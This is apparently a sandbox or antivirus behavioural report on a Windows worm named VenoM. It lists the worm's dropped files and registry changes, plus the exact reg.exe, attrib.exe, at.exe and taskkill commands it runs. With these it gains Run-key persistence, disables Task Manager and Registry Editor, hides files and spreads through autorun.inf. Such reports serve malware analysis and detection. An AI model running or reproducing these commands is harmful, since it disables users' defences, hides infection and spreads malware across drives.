Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'CFTMON.EXE' = '%WINDIR%\System\winlogon.exe'
- %WINDIR%\Tasks\At16.job
- %WINDIR%\Tasks\At17.job
- %WINDIR%\Tasks\At15.job
- %WINDIR%\Tasks\At13.job
- %WINDIR%\Tasks\At14.job
- %WINDIR%\Tasks\At18.job
- %WINDIR%\Tasks\At22.job
- %WINDIR%\Tasks\At23.job
- %WINDIR%\Tasks\At21.job
- %WINDIR%\Tasks\At19.job
- %WINDIR%\Tasks\At20.job
- %WINDIR%\Tasks\At12.job
- %WINDIR%\Tasks\At4.job
- %WINDIR%\Tasks\At5.job
- %WINDIR%\Tasks\At3.job
- %WINDIR%\Tasks\At1.job
- %WINDIR%\Tasks\At2.job
- %WINDIR%\Tasks\At6.job
- %WINDIR%\Tasks\At10.job
- %WINDIR%\Tasks\At11.job
- %WINDIR%\Tasks\At9.job
- %WINDIR%\Tasks\At7.job
- %WINDIR%\Tasks\At8.job
- hidden files (display turned off via the HKCU\...\Explorer\Advanced 'Hidden' = 2 reg.exe command listed below)
- file extensions (hidden via the HKCU\...\Explorer\Advanced 'HideFileExt' = 1 reg.exe command listed below)
- Windows Task Manager (Taskmgr) (blocked via the HKCU\...\Policies\System 'DisableTaskMgr' = 1 reg.exe command listed below)
- Registry Editor (RegEdit) (blocked via the HKCU\...\Policies\System 'DisableRegistryTools' = 1 reg.exe command listed below)
- '<SYSTEM32>\at.exe' 0 :13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 1:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 23 /delete
- '<SYSTEM32>\at.exe' 24 /delete
- '<SYSTEM32>\at.exe' 2:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 5:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 6:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 3:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 4:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 16 /delete
- '<SYSTEM32>\at.exe' 17 /delete
- '<SYSTEM32>\at.exe' 14 /delete
- '<SYSTEM32>\at.exe' 15 /delete
- '<SYSTEM32>\at.exe' 18 /delete
- '<SYSTEM32>\at.exe' 21 /delete
- '<SYSTEM32>\at.exe' 22 /delete
- '<SYSTEM32>\at.exe' 19 /delete
- '<SYSTEM32>\at.exe' 20 /delete
- '<SYSTEM32>\at.exe' 18:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 19:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 16:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 17:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 20:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 23:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\ntvdm.exe' -f
- '<SYSTEM32>\at.exe' 21:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 22:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 9:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 10:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 7:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 8:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 11:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 14:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 15:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 12:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 13:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 13 /delete
- '<SYSTEM32>\find.exe' "2008" desktop.inf
- '<SYSTEM32>\attrib.exe' +h %WINDIR%
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKCU\_VenoM_Software_413 413 413 \Virus" /v estas /d "infectado"
- '<SYSTEM32>\attrib.exe' -h -s "%TEMP%\1.tmp\lol.bat"й /y "%TEMP%\1.tmp\lol.bat" "C:\100% %USERNAME%.exe"
- '<SYSTEM32>\attrib.exe' +s +h C:\VenoM.666\*.exe
- '<SYSTEM32>\attrib.exe' +s +h C:\VenoM.666
- '<SYSTEM32>\attrib.exe' -r -a -s -h C:\*.inf /y autorun.inf C:\autorun.inf
- '<SYSTEM32>\attrib.exe' +s +h +r +a C:\autorun.inf
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%WINDIR%\System\winlogon.exe" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\lol.bat""
- '<SYSTEM32>\taskkill.exe' /f /im Ad-Watch.exe
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "1" /f
- '<SYSTEM32>\at.exe' 6 /delete
- '<SYSTEM32>\at.exe' 7 /delete
- '<SYSTEM32>\at.exe' 4 /delete
- '<SYSTEM32>\at.exe' 5 /delete
- '<SYSTEM32>\at.exe' 8 /delete
- '<SYSTEM32>\at.exe' 11 /delete
- '<SYSTEM32>\at.exe' 12 /delete
- '<SYSTEM32>\at.exe' 9 /delete
- '<SYSTEM32>\at.exe' 10 /delete
- '<SYSTEM32>\attrib.exe' +s +h +r +a Z:\autorun.inf
- '<SYSTEM32>\attrib.exe' +s +h Z:\VenoM.666\*.exe
- '<SYSTEM32>\attrib.exe' -h -s "%TEMP%\1.tmp\lol.bat"й /y "%TEMP%\1.tmp\lol.bat" "Z:\100% %USERNAME%.exe"
- '<SYSTEM32>\attrib.exe' -r -a -s -h Z:\*.inf /y autorun.inf Z:\autorun.inf
- '<SYSTEM32>\attrib.exe' +s +h Z:\VenoM.666
- '<SYSTEM32>\at.exe' 2 /delete
- '<SYSTEM32>\at.exe' 3 /delete
- '<SYSTEM32>\print.exe' VenoM.txt
- '<SYSTEM32>\at.exe' 1 /delete
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- %HOMEPATH%\VenoM.txt
- %HOMEPATH%\SendTo\Game Over 413 413 .txt
- %APPDATA%\desktop.inf
- C:\RECYCLER\Papelera de reciclaje compartida.exe
- %HOMEPATH%\autorun.inf
- %APPDATA%\services.exe
- %WINDIR%\Temp\scs5.tmp
- %WINDIR%\Temp\scs6.tmp
- %WINDIR%\Temp\scs3.tmp
- %APPDATA%\lsass.exe
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\system\winlogon.exe
- %HOMEPATH%\SendTo\Mis documetos.exe
- %APPDATA%\desktop.log
- %TEMP%\1.tmp\lol.bat
- <Current directory>\descarga.jpg
- %HOMEPATH%\SendTo\Disco extraible.pif
- <SYSTEM32>\%USERNAME% 3D.scr
- C:\RECYCLER\Documendos borrados de %USERNAME%.exe
- %WINDIR%.EXE
- %HOMEPATH%\SendTo\Documentos compartidos.scr
- %HOMEPATH%\desktop.inf
- %WINDIR%\Temp\scs5.tmp
- %WINDIR%\Temp\scs6.tmp
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs3.tmp
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-af8.af4.340004'
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-ad4.ad0.340004'
- ClassName: '(null)' WindowName: '(null)'